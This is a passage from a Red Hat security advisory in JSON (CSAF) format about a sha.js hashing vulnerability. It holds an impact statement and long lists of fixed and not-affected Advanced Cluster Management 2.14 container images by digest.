non-standard JavaScript objects into hash.update(). Most real-world Node.js applications and libraries already use Buffer, TypedArray, or String inputs, which are unaffected. Furthermore, Node\u2019s built-in crypto module, which is widely adopted, enforces stricter type-checking and is not impacted. As a result, the vulnerability mainly threatens projects that (a) directly depend on sha.js for cryptographically sensitive operations, and (b) hash untrusted input without type validation.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
